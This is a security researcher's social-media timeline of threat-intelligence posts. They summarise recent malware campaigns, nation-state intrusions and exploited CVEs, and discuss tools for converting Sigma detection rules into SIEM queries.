threat research • threat Intelligence • cloud security• supplychain security & random | Director of security research @Loginsoft_Inc
-
Opinions are my own
Here I created a quick map of resources if you're interested in hunting/tracking
malware & actors. You learn different techniques employed by researchers in our community.
https://t.co/PPKpgYu22m
If you don't want to signup for Mural, try this link
https://t.co/ZzpQsRW5tb
@Kostastsale@JayInfoSec@SOC_Prime But for the conversion of one SIEM query to another without using Sigma,I think it need a great effort to put in terms of research and dev.
I spent good no.of hours just translating Azure KQL to Splunk SPL but still, I am not confident that it is well-optimized w.r.t performance
@Kostastsale@JayInfoSec@SOC_Prime If you're looking for a conversion of Sigma to SIEM queries then we can either use sigmac or pysigma from the authors of Sigma itself. If we are fancy on UI then Socprime released opensource tooling
https://t.co/g4P6a6U9s2
Researchers uncover Statc Stealer, a dangerous #malware targeting Windows devices. It steals login data, cookies, #cryptocurency wallets, and sensitive information.
Find out more in this: https://t.co/WyQgInHndu
#cybersecurity#hacking#datasecurity
New findings: QakBot #malware operators set up 15 new command-and-control servers, raising questions about their activities during the 'break' period.
Read more: https://t.co/gYYc9zIW4k
#cybersecurity#technology
🚨 A Russian nation-state actor, Turla, strikes again with the powerful DeliveryCheck backdoor. Learn how it breaches #Microsoft Exchange servers and exfiltrates sensitive messages from Signal app.
Read more 👉 https://t.co/Z4uMfTZOrS
#cybersecurity
Microsoft has identified highly targeted social engineering attacks by the threat actor Midnight Blizzard (previously NOBELIUM) using credential theft phishing lures sent as Microsoft Teams chats. Get detailed analysis, IOCs, and recommendations: https://t.co/1Ywtrlnme6
In May, we observed a threat actor (TA) exploit PaperCut NG (CVE-2023-27350) to download/execute a Havoc C2 binary.
➡️The TA then reviewed tasklist before dumping credentials using Mimikatz.
➡️Next, the TA downloaded numerous RMM tools.
https://t.co/k8UVEOdKTQ #AllIntel
1/X
Under investigation: During a hunt for DLL sideloading abuse of vmnat.exe, Sophos X-Ops uncovered a campaign targeting an organization in Southeast Asia. Aligning with TTPs previously attributed to the Mustang Panda threat group, we unraveled a complex, sustained intrusion. 1/10
North Korean state actors linked to the RGB have been identified in the JumpCloud hack! An #OPSEC mistake exposed their IP address.
Find details here: https://t.co/3CMAw7tQZx
The new report also uncovers the use of malicious Ruby scripts and payloads like FULLHOUSE.DOORED, STRATOFEAR, and TIEDYE.
#cyberattacks #cybersecuritytips #technology
Linux-based vulnerabilities (CVE) exploit detection through runtime security using Falco/Rego #osquery & logs based detection using #sigma
https://t.co/M5SCioVQ2G
#infosec#threathunting#Linux#Exploit
AVrecon, a stealthy SOHO router botnet, has silently grown for over 2 years! Over 70,000 routers infected, spanning 20 countries.
Find details here: https://t.co/IvlJSXLTcA
#cybersecurity#informationsecurity#hacking
Citrix Gateway VPN compromised via CVE-2023-3519 (a critical unauthenticated RCE) shows evidence of exploitation on 7th July, 11 days before the official patch.
The attackers exfiltrated the system configuration file to then probably use the Metasploit module called "citrix_netscaler_config_decrypt" and gain access as the user "nsroot" (full system access), other important secrets about the network and internal users are leaked.
Webshell/backdoor logout.php has 0 detections in VirusTotal, I shared it here: https://t.co/IyrrM0yNfn
🚨 If you performed the update process to mitigate this vulnerability, assume that you might be compromised and perform a full assessment of the instances and users involved.
Follow these recommendations:
- https://t.co/js49XLDHX4
- https://t.co/js49XLDHX4
New blog post based on a recent intrusion I observed with #Ursnif as the initial infection!
Topics include:
✅ Detection opportunities
✅ TAs clipboard data
✅ Post-exploitation
and more!
The artifacts for this case: https://t.co/jTDVVL3pLp
The blog: https://t.co/cgKYZGaNFq
Cybercriminals are leveraging exploits for CVE-2021-40444 and CVE-2022-30190 to execute code through malicious Word files. Once opened, LokiBot #malware is downloaded, logging keystrokes, capturing screenshots, and stealing data.
Read: https://t.co/Sj7WBZHGBO
#cyberattack
Microsoft Incident Response's investigation of a BlackByte 2.0 ransomware attack that progressed in less than five days highlights the importance of disrupting common attack patterns, stopping attacker activities that precede ransomware deployment: https://t.co/oEpIpJuu1j